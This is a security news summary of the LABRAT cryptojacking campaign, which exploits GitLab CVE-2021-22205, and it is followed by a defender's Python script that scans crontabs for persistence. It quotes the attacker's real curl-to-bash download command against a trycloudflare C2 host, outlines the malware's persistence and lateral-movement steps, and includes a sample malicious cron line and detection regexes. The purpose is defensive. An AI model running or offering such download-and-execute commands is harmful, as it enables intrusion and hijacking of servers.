A new campaign called LABRAT is targeting GitLab with cryptojacking and proxyjacking.
LABRAT, a financially motivated operation, has been uncovered by the Sysdig Threat Research Team (TRT). Notably, the attackers have prioritized stealth and defense evasion tactics.
The LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit to conceal their crypto-mining activity by hiding files, processes, and CPU usage.
Technical Analysis – GitLab exploitation
The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205. In this vulnerability, GitLab does not properly validate image files passed to a file parser, resulting in remote command execution. There are many public exploits for this vulnerability, which is still actively exploited.
Once the attacker had access to the server, they executed the following command to download a malicious script from the C2 server:
curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash -
The initial script allowed the attacker to achieve persistence, evade defenses, and perform lateral movement through the following actions:
- Check whether the watchdog process is already running and, if so, kill it.
- Delete malicious files left over from a previous run, if any exist.
- Disable the defensive measures of Tencent Cloud and Alibaba Cloud, a recurring feature of many attackers' scripts.
- Download malicious binaries.
- Create a new service from one of these binaries and, if running as root, start it immediately.
- Modify various cron files to maintain persistence.
- Gather SSH keys, connect to the machines they grant access to, and start the process again there (lateral movement).
- Delete any evidence that the above steps may have generated.
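A defender-side check for the cron persistence step listed above, added here as an example and not code from the Sysdig report: it parses crontab text and flags entries that fetch a remote script and pipe it into a shell, disable TLS verification, point at a trycloudflare tunnel, or execute from a world-writable directory. The sample crontab, the placeholder domain and the credentials in it are constructed for the example.

```python
import re
from typing import List, Optional, Tuple

# Heuristics derived from the LABRAT TTPs above: a cron command that pipes a
# download straight into a shell, runs curl with certificate checks disabled,
# references a *.trycloudflare.com tunnel, or runs a binary dropped in /tmp.
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b")
INSECURE_TLS = re.compile(r"\bcurl\b[^|;&]*(\s-[a-zA-Z]*k[a-zA-Z]*\b|--insecure)")
TUNNEL_DOMAIN = re.compile(r"[\w.-]+\.trycloudflare\.com", re.IGNORECASE)
DROP_DIRS = re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+")

# Constructed sample crontab (not a real capture), modelled on the page's command.
SAMPLE_CRONTAB = """\
# constructed sample for the example
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -kL -u user:pass https://attacker-placeholder.trycloudflare.com/v3 | bash -
@reboot /dev/shm/.x/watchdog >/dev/null 2>&1
"""

def parse_cron_line(line: str, system_table: bool = False) -> Optional[str]:
    """Return the command part of a crontab entry (whitespace-normalised),
    or None for blank lines and comments. Handles the 5-field user crontab
    format, @reboot-style shortcuts, and, with system_table=True, the
    /etc/cron.d format that carries a user name before the command."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    n = 1 if fields[0].startswith("@") else 5
    if system_table:
        n += 1
    return " ".join(fields[n:]) if len(fields) > n else None

def scan_crontab(text: str, system_table: bool = False) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, command, reasons) for every suspicious entry."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        cmd = parse_cron_line(raw, system_table)
        if cmd is None:
            continue
        reasons = []
        if FETCH_TO_SHELL.search(cmd):
            reasons.append("remote script piped into shell")
        if INSECURE_TLS.search(cmd):
            reasons.append("curl with TLS verification disabled")
        if TUNNEL_DOMAIN.search(cmd):
            reasons.append("trycloudflare tunnel domain")
        if DROP_DIRS.search(cmd):
            reasons.append("executes from world-writable temp dir")
        if reasons:
            findings.append((lineno, cmd, reasons))
    return findings
```

Run it over `/etc/crontab`, `/etc/cron.d/*` (with `system_table=True`) and each user's crontab; a rootkit that hides processes does not hide the cron files that restart them.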
For more details on the LABRAT campaign:
https://hackersonlineclub.com/gitlab-exploited-labrat-cryptojacking-and-proxyjacking/